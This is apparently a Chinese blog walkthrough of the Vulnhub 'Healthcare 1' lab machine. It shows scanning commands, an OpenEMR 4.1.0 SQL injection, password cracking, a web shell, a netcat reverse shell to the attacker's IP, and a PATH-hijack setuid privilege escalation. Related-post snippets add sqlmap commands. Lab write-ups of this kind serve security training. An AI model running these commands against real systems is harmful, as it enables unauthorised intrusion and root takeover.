Vulnhub: Healthcare 1靶机

ctostm

已于 2023-06-07 23:22:37 修改

阅读量116

点赞数

文章标签：安全网络安全 web安全

于 2023-05-19 19:56:08 首次发布

本文链接：https://blog.csdn.net/qq_43884092/article/details/130773077

版权

kali：192.168.111.111

靶机：192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

目录爆破

feroxbuster -k -d 1 --url http://192.168.111.130  -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1 -e -C 404

访问openemr目录，同时发现openemr版本为4.1.0

搜索该版本漏洞，发现存在sql注入

searchsploit openemr 4.1.0

漏洞利用

利用exp进行sql注入

john爆破密文

john hash --wordlist=/usr/share/wordlists/rockyou.txt

得到admin的密码ackbar，登录后台

修改网站源码写入一句话木马

访问http://192.168.111.130/openemr/sites/default/config.php?cmd=nc -e /bin/bash 192.168.111.111 4444，获得反弹shell

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

发现/usr/bin/healthcheck该文件会执行ifconfig

修改环境变量提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/usr/bin/healthcheck
/tmp/bash -p

flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ctostm

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub: Healthcare 1靶机

openemr4.1.0 sql注入，环境变量提权
复制链接

扫一扫

unity-workshop：Healthcare Unity Workshop中的R Lab XR

02-06

【Unity Workshop：Healthcare Unity Workshop中的R Lab XR】在Unity Workshop中，"Healthcare Unity Workshop"专注于利用Unity引擎开发虚拟现实(VR)解决方案，特别是针对医疗领域的应用。这个工作坊结合了Unity的...

Findkyhealthcare:findky.Healthcare

06-01

##查找 KY 医疗保健创建此网站是为了帮助人们在肯塔基州找到 Medicaid 医疗保健提供者。用户可以访问该站点并向其他用户提供有关该医疗保健提供者是否接受医疗补助以及是否接受新患者的信息。...

参与评论您还未登录，请先登录后发表或查看评论

Healthcare渗透思路：

weixin_54105551的博客

08-04

547

本章为Healthcare渗透思路，这个只是个人的渗透思路，写的不好，勿喷，刚学习网络安全不久，最后谢谢大家的观看。

Healthcare靶机总结

qq_45301512的博客

01-12

432

靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到,靶机开放了21端口和80端口21端口为ftp的端口,一般遇到这种,就可以考虑ftp的匿名登录,我们可以试一下用户名anonymous,没有密码,这里登录失败那么只能根据80端口,打开网站,然后去网站入手打开网站先试试功能点,看能否找到可利用的漏洞,这里没发现漏洞点然后可以在源代码里面找找看有没有提示,这里也没有。

Vulnhub Healthcare靶机教程

一个努力学习网安的小牛马

10-10

191

Vulnhub靶机 Healthcare 保姆级教程过程内容详细

看完这篇教你玩转渗透测试靶机Vulnhub——Healthcare:1

Aluxian_的博客

10-01

1005

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VMware或者Oracle VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate（中级的）1.信息收集工具得使用2.环境变量提权，这个靶机比较简单没啥新得知识点！3.sqlmap工具的使用搜索利用反弹shell的使用🆗又是收获满满的一天最后创作不易，希望对大家有所帮助喜欢的话麻烦大家给个一键三连你的开心就是我最大的快乐！

看完这篇教你玩转渗透测试靶机Vulnhub——Healthcare 1_healthcare 靶机

2401_84715732的博客

05-12

469

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VMware或者Oracle VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate（中级的）

Vulnhub靶机 Healthcare

菜浪马废的博客

09-17

748

没有可利用的漏洞扫一下目录有注入漏洞 sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbs sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tables sqlmap -u http://192.168.80.142/openemr//interf.

Healthcare靶机wp

m0_52496313的博客

08-18

278

Healthcare靶机wp

healthcare靶机(openEMR管理系统SQL注入漏洞)

m0_66299232的博客

11-25

558

6.在files,有一个配置文件可以更改，那么就可以把php-reverse-shell.php（github里有）的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本，可以利用，只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。

Healthcare-dbm：稍后

03-04

1. 数据库管理系统（DBMS）：Healthcare-dbm可能是一个专门设计用于存储、管理和处理医疗保健领域数据的系统。DBMS是这样的系统的基础，它确保数据的安全性、一致性和可靠性。 2. 医疗信息标准化：在医疗保健领域，...

ISO 22956：2021 Healthcare organization management - Requirements

10-01

ISO 22956：2021 Healthcare organization management - Requirements

greywing-wp:Greywing Healthcare的用户界面

03-27

1. **响应式设计**：为了适应不同设备和屏幕尺寸，CSS3的媒体查询被广泛使用，确保界面在手机、平板和桌面电脑上都能正确显示。 2. **布局管理**：CSS通过盒模型（box model）控制元素的宽度、高度、内边距和外边距...

移动互联安全扩展要求测评项

hakksjss的博客

07-10

1085

应为无线接入设备的安装选择合理位置，避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当，易被攻击者利用，特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击，因此要选择合理的位置安装无线接入设备。

警钟！电池储能安全事故频发！物联网技术如何加强储能安全排查？

olzorange的博客

07-08

434

物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。

车载视频监控管理方案：无人驾驶出租车安全出行的保障

最新发布

TSINGSEE青犀视频官方技术博客

07-12

542

为了确保数据的安全性和可靠性，本方案采用云存储技术，将车辆视频数据和相关信息存储在云端。

网络设备安全

weixin_48579910的博客

07-11

838

交换机作为网络核心设备，其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施，可以有效防范各种安全威胁。结合使用适当的安全工具和技术，组织可以大幅提高其交换机的安全防护能力，保护网络基础设施和数据的安全。定期进行安全审计和更新，确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。

[终端安全]-5 移动终端之操作系统安全

wendywm0496的博客

07-08

1026

每个应用程序运行在一个独立的进程中，通过操作系统的内存管理单元（MMU）实现自己独立的虚拟地址空间，通常从0开始到某个最大值（例如，32位系统上为4GB），这个空间是进程私有的，MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时，会切换当前的页表，通过改变MMU中存储的页表基地址（通常存储在寄存器中）来实现，这样进程A和进程B即使使用相同的虚拟地址，也会映射到不同的物理地址。当用户启动应用A时，操作系统会为其创建一个新的进程，该进程由应用A的UID 10001运行；

nlp-chealcusserc: a chinese healthcare customer service corpus - magichub

09-16

NLP-CHEALCUSSERC（中文医疗客服语料库）是MagicHub（魔盒）开发的一个语料库。这个语料库被设计用于训练和评估中文自然语言处理（NLP）模型，特别是在医疗客服领域。它收集了丰富的中文医疗客服对话数据，以提供一...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交